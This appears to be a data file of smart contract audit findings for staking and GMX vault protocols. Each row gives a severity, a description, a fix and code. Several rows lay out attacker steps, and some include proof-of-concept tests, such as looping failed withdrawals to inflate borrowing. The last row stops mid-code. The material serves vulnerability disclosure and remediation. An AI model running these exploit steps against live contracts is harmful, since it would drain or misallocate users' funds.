_updateLock(\\n Lock memory _lock,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal view returns (Lock memory) {\\n if ((_lock.expiry == 0 || _lock.expiry > block.timestamp) && _lockingDuration < _lock.duration) {\\n revert InvalidLockingDuration();\\n }\\n\\n Lock memory lock = Lock(_lock.amount, _lock.boostAmount, _lock.startTime, _lock.duration, _lock.expiry);\\n\\n uint256 baseAmount = _lock.amount + _amount;\\n uint256 boostAmount = boostController.getBoostAmount(baseAmount, _lockingDuration);\\n\\n // rest of code\\n lock.boostAmount = boostAmount;\\n // rest of code\\n}\\n```\\n\\nMost important to note here is that (1) since the `_lockingDuration` of 9_999 is greater than the existing duration of 5_000, this call will succeed, and (2) the `boostAmount` is recalculated now using the new `maxBoost` value of 5. We can calculate the new attacker's `boostAmount` to be: 100_000 * 5 * 9_9999/10_000 = 499_950. Since this value is less than the previous 500_000, `queuedRESDLSupplyChange` in the `_queueLockUpdate` call will be decremented by 50.\\nAfter the `SDLPoolSecondary:extendLockDuration` function call is complete, this update will be queued. At some point an update to this secondary SDL pool will be triggered & once that's complete, the attacker will then be able to execute this update. To do so, the attacker calls `executeQueuedOperations`, specifying their reNFT, which then triggers `_executeQueuedLockUpdates` which has the following logic:\\n```\\n// rest of code\\nuint256 numUpdates = queuedLockUpdates[lockId].length;\\n\\nLock memory curLockState = locks[lockId];\\nuint256 j = 0;\\nwhile (j < numUpdates) {\\n if (queuedLockUpdates[lockId][j].updateBatchIndex > finalizedBatchIndex) break;\\n\\n Lock memory updateLockState = queuedLockUpdates[lockId][j].lock;\\n int256 baseAmountDiff = int256(updateLockState.amount) - int256(curLockState.amount);\\n int256 boostAmountDiff = int256(updateLockState.boostAmount) - int256(curLockState.boostAmount);\\n\\n if (baseAmountDiff < 0) {\\n // rest of code\\n } else if (boostAmountDiff < 0) {\\n locks[lockId].expiry = updateLockState.expiry;\\n locks[lockId].boostAmount = 0;\\n emit InitiateUnlock(_owner, lockId, updateLockState.expiry);\\n } else {\\n // rest of code\\n }\\n // rest of code\\n}\\n// rest of code\\n```\\n\\nRecall that the attacker only has a single update, with the only difference being the decrease of 50 for the `boostAmount`. This will trigger the logic based on the `boostAmountDiff < 0` statement which will set `locks[lockId].boostAmount = 0`. This is clearly incorrect logic & will allow the attacker to then fraudulently increase `queuedRESDLSupplyChange`, which will ultimately lead to more rewards going to this secondary chain.\\nContinuing this attack, the attacker will again call `SDLPoolSecondary:extendLockDuration`, but this time with a `_lockingDuration` of 10_000. Referencing the same code snippet as earlier, in `_updateLock`, `boostAmount` is now being calculated as: 100_000 * 5 * 10_000/10_000 = 500_000. In `_queueLockUpdate`, `queuedRESDLSupplyChange` is calculated to be: (100_000 + 500_000) - (100_000 + 0) = 500_000, based on this equation:\\n```\\nqueuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n```\\n\\nRecall that this value of 0 comes from the improper logic in the `_executeQueuedLockUpdates` function call. Ultimately, in aggregate, `queuedRESDLSupplyChange` has been increased by 500_000 - 50 = 499_950. Had the attacker simply increased their locking duration to the max value of 10_000 after the update, there would be 0 change in the `queuedRESDLSupplyChange`.\\nThe fundamental bug here is that post a decrease in `maxBoost`, the update logic allows all existing reSDL NFTs to be able to increase `queuedRESDLSupplyChange` more than should be possible, & `queuedRESDLSupplyChange` is a major factor in terms of the percentage of rewards going to a given secondary chain.",The `_executeQueuedLockUpdates` function implicitly assumes if there's a decrease in `boostAmountDiff` then the lock update comes from calling `initiateUnlock`. There needs to be an additional case to handle this scenario due to a decrease in the `maxBoost`.,"Users with existing reSDL NFTs on secondary chains (prior to a decrease in the maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain.","```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n" +Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the secondary pool,low,"The SDLPoolCCIPControllerSecondary::performUpkeep() function is only available when there is a `message of rewards` from the `SDLPoolCCIPControllerPrimary`. That could be a problem if there are not rewards to distribute in a specific `secondary chain` causing that queue updates from the `secondarly chain` will not be informed to the `SDLPoolPrimary`.\\nThe `secondary chain` informs to the `primary chain` the new `numNewRESDLTokens` and `totalRESDLSupplyChange` using the SDLPoolCCIPControllerSecondary::performUpkeep function, then the `primary chain` receives the information and it calculates the new mintStartIndex. Note that the `primary chain` increments the `reSDLSupplyByChain` in the `code line 300`, this so that the `primary chain` has the information on how much supply of reSDL tokens there is in the secondary chain:\\n```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n\\nNow the mintStartIndex is send to the secondary chain code line 307 and the secondary chain receives the new mintStartIndex. This entire process helps to keep the information updated between the primary chain and the secondary chain.\\nOn the other hand, when a secondary chain receive rewards, the secondary chain can call the function SDLPoolCCIPControllerSecondary::performUpkeep since `shouldUpdate` is `true` at code line 157:\\n```\\nFile: SDLPoolCCIPControllerSecondary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n if (_message.data.length == 0) {\\n uint256 numRewardTokens = _message.destTokenAmounts.length;\\n address[] memory rewardTokens = new address[](numRewardTokens);\\n if (numRewardTokens != 0) {\\n for (uint256 i = 0; i < numRewardTokens; ++i) {\\n rewardTokens[i] = _message.destTokenAmounts[i].token;\\n IERC20(rewardTokens[i]).safeTransfer(sdlPool, _message.destTokenAmounts[i].amount);\\n }\\n ISDLPoolSecondary(sdlPool).distributeTokens(rewardTokens);\\n if (ISDLPoolSecondary(sdlPool).shouldUpdate()) shouldUpdate = true;\\n }\\n } else {\\n uint256 mintStartIndex = abi.decode(_message.data, (uint256));\\n ISDLPoolSecondary(sdlPool).handleIncomingUpdate(mintStartIndex);\\n }\\n\\n emit MessageReceived(_message.messageId, _message.sourceChainSelector);\\n }\\n```\\n\\nOnce `shouldUpdate` is `true`, the function SDLPoolCCIPControllerSecondary::performUpkeep can be called in order to send the new information (numNewRESDLTokens and totalRESDLSupplyChange) to the primary chain:\\n```\\n function performUpkeep(bytes calldata) external {\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n\\nThe problem is that the `primary chain` needs to send rewards to the `secondary chain` so that `shouldUpdate` is true and the function SDLPoolCCIPControllerSecondary::performUpkeep can be called. However, in certain circumstances it is possible that the `secondary chain` may never be able to send information to the `primary chain` since there may not be any rewards for the `secondary chain`. Please consider the next scenario:\\n`UserA` stakes directly in the `secondary chain` and the queuedRESDLSupplyChange increments\\nThe increase in supply CANNOT be reported to the `primary chain` since `shouldUpdate = false` and the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nRewards are calculated on the `primary chain`, however because the `secondary chain` has not been able to send the new supply information, zero rewards reSDLSupplyByChain will be calculated for the `secondary chain` since `reSDLSupplyByChain[chainSelector]` has not been increased with the new information from `step 1`.\\nSince there are NO rewards assigned for the `secondary chain`, it is not possible to set `shouldUpdate=True`, therefore the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nThe following test shows that a user can send `sdl` tokens to the `secondary pool` however SDLPoolCCIPControllerSecondary::performUpkeep cannot be called since there are no rewards assigned to the secondary pool:\\n```\\n// File: test/core/ccip/sdl-pool-ccip-controller-secondary.test.ts\\n// $ yarn test --grep ""codehawks performUpkeep reverts""\\n// \\n it('codehawks performUpkeep reverts', async () => {\\n await token1.transfer(tokenPool.address, toEther(1000))\\n let rewardsPool1 = await deploy('RewardsPool', [sdlPool.address, token1.address])\\n await sdlPool.addToken(token1.address, rewardsPool1.address)\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 400)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n //\\n // 1. Mint in the secondary pool\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n //\\n // 2. The secondary pool needs to update data to the primary chain but the `controller.shouldUpdate` is false so `performUpkeep` reverts the transaction\\n assert.equal(await sdlPool.shouldUpdate(), true)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n await expect(controller.performUpkeep('0x')).to.be.revertedWith('UpdateConditionsNotMet()')\\n })\\n```\\n","Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the `secondary pool`\\nThe SDLPoolCCIPControllerSecondary::performUpkeep function may check if the `secondary pool` has new information and so do not wait for rewards to be available for the secondary pool:\\n```\\n function performUpkeep(bytes calldata) external {\\n// Remove the line below\\n// Remove the line below\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n// Add the line below\\n// Add the line below\\n if (!shouldUpdate && !ISDLPoolSecondary(sdlPool).shouldUpdate()) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n","`numNewRESDLTokens` and `totalRESDLSupplyChange` updates from the `secondary pool` to the `primary pool` may not be executed, causing the rewards calculation to be incorrect for each chain.\\nTools used\\nManual review","```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n" +depositors face immediate loss in case `equity = 0`,medium,"The vulnerability in the `valueToShares` function exposes users to significant losses in case the equity `(currentAllAssetValue - debtBorrowed)` becomes zero due to strategy losses, users receive disproportionately low shares, and take a loss Immediately.\\nWhen a user deposits to the contract, the calculation of the shares to be minted depends on the `value` of `equity` added to the contract after a successful deposit. In other words:\\n`value` = `equityAfter` - `equityBefore`, while:\\n`equity` = `totalAssetValue` - `totalDebtValue`. and we can see that here :\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n\\nNOTICE: When the equity value is `0`, the shares minted to the user equal the deposited value itself. The equity value can become zero due to various factors such as strategy losses or accumulated lending interests... ect\\nIn this scenario, the user immediately incurs a loss, depending on the total supply of `svToken` (shares).\\nConsider the following simplified example:\\nThe total supply of `svToken` is (1,000,000 * 1e18) (indicating users holding these shares).\\nthe equity value drops to zero due to strategy losses and a user deposits 100 USD worth of value,\\nDue to the zero equity value, the user is minted 100 shares (100 * 1e18).\\nConsequently, the value the user owns with these shares immediately reduces to 0.001 USD. `100 * 100 * 1e18 / 1,000,000 = 0.001 USD` (value * equity / totalSupply).\\nIn this case, the user immediately shares their entire deposited value with these old minted shares and loses their deposit, whereas those old shares should be liquidated some how.\\nNotice: If the total supply is higher, the user loses more value, and vice versa.",use a liquidation mechanism that burns the shares of all users when equity drops to zero.,users face immediate loss of funds in case equity drops to zero,"```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n" +incorrect handling of compound cancelation lead vault to stuck at `compound_failed` status,medium,"the compound function allows the keeper to swap a token for TokenA or TokenB and add it as liquidity to `GMX`. However, if the deposit get cancelled, the contract enters a `compound_failed` status. leading to a deadlock and preventing further protocol interactions.\\n-The `compound` function is invoked by the keeper to swap a token held by the contract (e.g., from an airdrop as sponsor said) for TokenA or TokenB. Initially, it exchanges this token for either tokenA or tokenB and sets the status to `compound`. Then, it adds the swapped token as liquidity to `GMX` by creating a deposit:\\n```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this return in case zero balance?? zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n\\nIn the event of a successful deposit, the contract will set the status to `open` again. However, if the deposit is cancelled, the callback will call `processCompoundCancellation()` function and the status will be set to `compound_failed` as shown in the following code:\\n```\\n function processCompoundCancellation(GMXTypes.Store storage self) external {\\n GMXChecks.beforeProcessCompoundCancellationChecks(self);\\n self.status = GMXTypes.Status.Compound_Failed;\\n\\n emit CompoundCancelled();\\n }\\n```\\n\\nThe issue arises when the deposit is cancelled, and the status becomes `compound_failed`. In this scenario, only the compound function can be called again and only by the keeper, but the tokens have already been swapped for TokenA or TokenB (Because we successfully create a deposit in `GMX` that means the swap was successfull). Consequently, the `amountIn` will be zero, and in this case the compound logic will be skipped.\\n```\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n //compound logic\\n //// rest of code.\\n }\\n```\\n\\nAs a result, the status will remain `compound_failed`, leading to a deadlock. If keeper continue to call this function, no progress will be made, only gas will be wasted. Furthermore, all interactions with the protocol are impossible since the status is `compound_failed`.",incorrect handling of compound cancelation lead vault to stuck at `compound_failed` status\\nin the event of a deposit get cancelled when trying to compound. just add liquidity again without the swapping logic.,strategy vault stuck at `compond_failed` status. prevent any interaction with the protocol\\nkeeper may waste a lot of gas trying to handle this situation .,"```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this return in case zero balance?? zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n" +The protocol will mint unnecessary fees if the vault is paused and reopened later.,medium,"Unnecessary fees will be minted to the treasury if the vault is paused and reopened later.\\nBased on the test results, the protocol mints 5(this can be more) wei(gvToken) for each `gvToken` every second since the last fee collection. For example, if the `totalSupply` of `gvToken` is 1000000e18 and the time difference between the current block and the last fee collection is 10 seconds, the amount of lp tokens minted as a fee will be 50000000 wei in terms of `gvToken`. This is acceptable when the protocol is functioning properly.\\n```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n\\nHowever, if the protocol needs to be paused due to a hack or other issues, and then the vault is reopened, let's say after 1 month of being paused, the time difference from `block.timestamp - _secondsFromLastCollection` will be = 2630000s\\nIf the first user tries to deposit after the vault reopens, the fees charged will be 1000000e18 * 5 * 2630000 / 1e18 = 1315000000000\\nThis is an unnecessary fee generated for the treasury because the vault was paused for a long time, but the fee is still generated without taking that into account. This can result in the treasury consuming a portion of the user shares.","If the vault is being reopened, there should be a function to override the _store.lastFeeCollected = block.timestamp; with block.timestamp again.","This will lead to a loss of user shares for the duration when the vault was not active. The severity of the impact depends on the fee the protocol charges per second, the totalSupply of vault tokens, and the duration of the vault being paused.",```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n +`emergencyPause` does not check the state before running && can cause loss of funds for users,medium,"The `emergencyPause` function in the GMX smart contract can be called by the keeper at any time without pre-transaction checks. In some cases this could result in financial loss for users if the function is executed before the callbacks have executed.\\nThe emergencyPause function lacks a control mechanism to prevent execution before callbacks execution. While it is designed to halt all contract activities in an emergency, its unrestricted execution could disrupt ongoing transactions. For example, if a user calls a function like deposit which involves multiple steps and expects a callback, and emergencyPause is invoked before the callback is executed, the user might lose his funds as he will not be able to mint svTokens.\\nSince `emergencyPause` updates the state of the Vault to `GMXTypes.Status.Paused`, when the callback from GMX executes the `afterDepositExecution` nothing will happen since the conditions are not met. Which means that any deposit amount will not be met by a mint of svTokens.\\n```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n\\nIf by any chance, the `processDeposit` function is executed (or any other function from the callback) it will still revert in the beforeChecks (like the beforeProcessDepositChecks).\\n```\\n function beforeProcessDepositChecks(\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Deposit)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n","To mitigate this risk, the following recommendations should be implemented:\\nIntroduce a state check mechanism that prevents emergencyPause from executing if there are pending critical operations that must be completed to ensure the integrity of in-progress transactions.\\nImplement a secure check that allows emergencyPause to queue behind critical operations, ensuring that any ongoing transaction can complete before the pause takes effect.","If the emergency pause is triggered at an inopportune time, it could:\\nPrevent the completion of in-progress transactions.\\nLead to loss of funds if the transactions are not properly rolled back.\\nErode user trust in the system due to potential for funds to be stuck without recourse.\\nPOC :\\nYou can copy this test in the file GMXEmergencyTest.t.sol then execute the test with the command forge test --mt\\n```\\n function test_UserLosesFundsAfterEmergencyPause() external {\\n deal(address(WETH), user1, 20 ether);\\n uint256 wethBalanceBefore = IERC20(WETH).balanceOf(user1);\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 10e18, 1, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n vm.prank(owner);\\n vault.emergencyPause();\\n\\n vm.prank(user1);\\n mockExchangeRouter.executeDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n uint256 wethBalanceAfter = IERC20(WETH).balanceOf(user1);\\n //Check that no tokens have been minted to user while user loses funds = 10 eth\\n assertEq(IERC20(vault).balanceOf(user1), 0);\\n assertEq(wethBalanceAfter, wethBalanceBefore - 10 ether);\\n\\n }\\n```\\n","```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n" +try-catch does not store the state when it is reverted,high,"If a withdrawal from GMX is successful without any errors, the borrowed amount is repayed to the lending vaults within a try-catch block within the processWithdraw function. Subsequently, the afterWithdrawChecks are performed. If a revert occurs during this step, everything executed within the try-catch block is reseted, and the Vault's status is set to 'Withdraw_Failed.' In such a scenario, a Keeper must call the processWithdrawFailure function. In this case, there is an erroneous attempt to borrow from the LendingVaults again, even though the repayment never actually occurred due to the revert within the try-catch block.\\nHere is a POC that demonstrates how a user can exploit this bug by intentionally causing the afterWithdrawChecks to fail, resulting in additional borrowing from the LendingVault in the processWithdrawFailure function.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. (Token A is irrelevant as Delta is 